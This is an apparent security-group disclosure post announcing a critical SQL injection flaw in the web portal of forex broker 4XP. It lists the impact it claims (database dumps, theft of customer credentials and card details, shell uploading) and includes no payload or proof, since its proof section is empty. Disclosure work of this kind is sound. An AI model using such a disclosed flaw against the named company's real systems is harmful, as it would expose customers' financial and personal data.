zSecure team has recently discovered a critical SQL Injection Vulnerability in the web portal of 4XP, a leading online forex broker having more than 1 lakh customer base. Financial transactions are carried on the broker's paltform on daily basis including but not limited to Credit Card Transactions. The critical vulnerability allows to get complete access to brokers database which can be misused to access their customers confidential information including their login id's, passwords, home address, email-id's, mobile no's, credit card details etc. This critical vulnerbility could prove devastating to the company if they doesn't fix it asap. Below are the details about the company & discovered vulnerability.
About the Company
4XP is an online forex broker that specializes in providing an all-inclusive trading package backed by a caring and devoted support team. 4XP was founded by a group of retail-ended entrepreneurs and capital market dealers sharing a vision for creating a customer-oriented brokerage service that would provide a compelling trading solution. 4XP strives toward creating the most professional and transparent trading environment possible.
Vulnerability details
Vulnerability Type: Hidden SQL Injection Vulnerability
Database Type: MySql
Alert Level: Critical
Threats: Complete Database Access, Database Dump, Shell Uploading
Worst case scenarios
Any malicious smart black hats can create much more devastating attacks using this critical flaw such as:
- Uninterrupted access to the database
- Database Dump;
- Possibility of shell uploading which may result in defacement of website; and
- Much more . . .
Proof of vulnerability
Source
